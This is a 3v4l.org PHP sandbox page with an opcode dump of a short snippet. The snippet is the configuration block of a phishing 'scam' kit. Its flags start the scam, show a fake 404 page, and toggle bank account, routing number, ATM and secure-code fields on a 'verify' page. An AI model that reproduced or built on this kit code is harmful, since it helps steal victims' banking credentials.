3v4l.org

run code in 300+ PHP versions simultaneously
<?php if (!isset($_SESSION)) { session_start(); } $_SESSION['MessageOFF']="Erreur 404<br>"; //this is the best Option for this scam ,please Change anything $start=true; //true :start the scam //false : show erreur 404 //__________________________________________________________________________________________________ $convertimage=true; //true to coverting text to image //=====> Scam Option for labels of verify Page <===== $bkA=false; //true : for show Bank Account Number label ,false :for hidden //------------------------------------------------------------------------------------- $bkR=false; //true : for show Bank Routing Number label ,false :for hidden //------------------------------------------------------------------------------------- $atmO=false; //true : for show ATM label ,false :for hidden //------------------------------------------------------------------------------------- $securcode=true; //true : for show Secure Code label ,false :for hidden //------------------------------------------------------------------------------------- ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 3, Position 2 = 5
Branch analysis from position: 3
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 5
filename:       /in/vf2FD
function name:  (null)
number of ops:  15
compiled vars:  !0 = $start, !1 = $convertimage, !2 = $bkA, !3 = $bkR, !4 = $atmO, !5 = $securcode
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ISSET_ISEMPTY_VAR                             2  ~6      '_SESSION'
          1        BOOL_NOT                                         ~7      ~6
          2      > JMPZ                                                     ~7, ->5
    3     3    >   INIT_FCALL                                               'session_start'
          4        DO_ICALL                                                 
    5     5    >   FETCH_W                      global              $9      '_SESSION'
          6        ASSIGN_DIM                                               $9, 'MessageOFF'
          7        OP_DATA                                                  'Erreur+404%3Cbr%3E'
    7     8        ASSIGN                                                   !0, <true>
   12     9        ASSIGN                                                   !1, <true>
   18    10        ASSIGN                                                   !2, <false>
   21    11        ASSIGN                                                   !3, <false>
   24    12        ASSIGN                                                   !4, <false>
   27    13        ASSIGN                                                   !5, <true>
   31    14      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
154.6 ms | 1394 KiB | 15 Q